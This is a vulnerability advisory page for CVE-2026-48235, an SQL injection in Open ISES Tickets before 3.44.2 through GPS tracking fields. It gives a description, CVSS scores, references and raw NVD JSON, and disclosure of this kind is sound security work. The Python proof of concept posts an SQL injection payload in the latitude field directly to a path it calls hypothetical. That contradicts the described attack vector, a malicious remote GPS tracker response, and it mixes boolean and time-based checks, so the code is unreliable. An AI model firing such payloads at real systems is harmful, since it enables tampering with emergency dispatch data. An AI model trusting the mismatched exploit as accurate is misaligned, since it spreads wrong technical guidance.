CVE-2026-48235

Description

Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in incs/remotes.inc.php where latitude, longitude, callsign, mph, altitude, and timestamp values parsed from external GPS tracking service XML/JSON responses (InstaMapper and Google Latitude integration) are concatenated into UPDATE and INSERT statements without sanitization. An attacker able to compromise or impersonate the remote GPS tracker endpoint can inject SQL to manipulate the responder location, tracks, and assignment tables.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open ISES Tickets < 3.44.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-48235
# Conceptual demonstration of SQL Injection via GPS tracking parameters
# Target: Open ISES Tickets < 3.44.2

import requests
import json

# The endpoint that processes GPS updates (hypothetical path based on description)
target_url = "http://target-openises.com/incs/remotes.inc.php"

# Malicious payload targeting the 'latitude' parameter
# This attempts to perform a boolean-based blind SQL injection
sql_payload = "1' AND 1=1-- -"

# Constructing the malicious JSON data simulating a GPS tracker update
malicious_data = {
    "latitude": sql_payload,
    "longitude": "-122.4194",
    "callsign": "ATTACKER01",
    "mph": "0",
    "altitude": "0",
    "timestamp": "2026-05-21 12:00:00"
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "GPSTracker/1.0"
}

try:
    response = requests.post(target_url, data=json.dumps(malicious_data), headers=headers)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check database for potential manipulation or time-based delays.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-48235
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-48235
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-48235/
[4] VulDB https://vuldb.com/cve/CVE-2026-48235
[5] https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
[6] https://github.com/openises/tickets/releases/tag/v3.44.2
[7] https://www.vulncheck.com/advisories/open-ises-tickets-sql-injection-via-incs-remotes-inc-php-multiple-parameters

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-48235", "sourceIdentifier": "[email protected]", "published": "2026-05-21T18:16:20.310", "lastModified": "2026-05-21T19:10:12.323", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in incs/remotes.inc.php where latitude, longitude, callsign, mph, altitude, and timestamp values parsed from external GPS tracking service XML/JSON responses (InstaMapper and Google Latitude integration) are concatenated into UPDATE and INSERT statements without sanitization. An attacker able to compromise or impersonate the remote GPS tracker endpoint can inject SQL to manipulate the responder location, tracks, and assignment tables."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff", "source": "[email protected]"}, {"url": "https://github.com/openises/tickets/releases/tag/v3.44.2", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/open-ises-tickets-sql-injection-via-incs-remotes-inc-php-multiple-parameters", "source": "[email protected]"}]}}